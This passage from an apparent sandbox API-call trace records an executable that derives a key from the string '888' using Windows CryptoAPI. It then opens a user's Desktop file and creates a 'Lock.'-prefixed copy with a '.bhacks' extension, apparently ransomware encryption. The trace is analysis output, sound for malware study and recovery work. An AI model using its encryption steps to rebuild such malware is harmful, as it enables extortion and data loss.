dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.592] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.592] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0103.592] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0103.593] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b78 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0103.593] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.594] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.594] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0103.594] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0103.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0103.594] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.594] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0103.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0103.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7060, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0103.595] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9becd0) returned 1 [0103.596] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0103.596] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0103.596] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.596] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.596] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0103.596] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0103.596] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0103.596] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.596] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.596] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.648] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.648] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.648] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.648] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.648] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.648] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9df0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0103.649] CryptCreateHash (in: hProv=0x9becd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0103.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0103.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0103.649] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0103.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0103.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0103.649] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.649] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0103.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9e50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0103.649] CryptHashData (hHash=0x9a3b80, pbData=0x2a71aa8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0103.649] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.650] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.650] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.650] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0103.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0103.651] CryptDeriveKey (in: hProv=0x9becd0, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4780) returned 1 [0103.651] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.651] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6e80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0103.651] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0103.651] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/nYVw1n1XTh2-sApcS7w.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\nyvw1n1xth2-sapcs7w.mp4.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0103.652] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.652] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0103.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0103.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0103.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0103.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75510 [0103.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.653] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0103.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75510 | out: hHeap=0x2af0000) returned 1 [0103.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0103.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0103.653] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.nYVw1n1XTh2-sApcS7w.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.nyvw1n1xth2-sapcs7w.mp4.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0103.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0103.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0103.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0103.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0103.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) 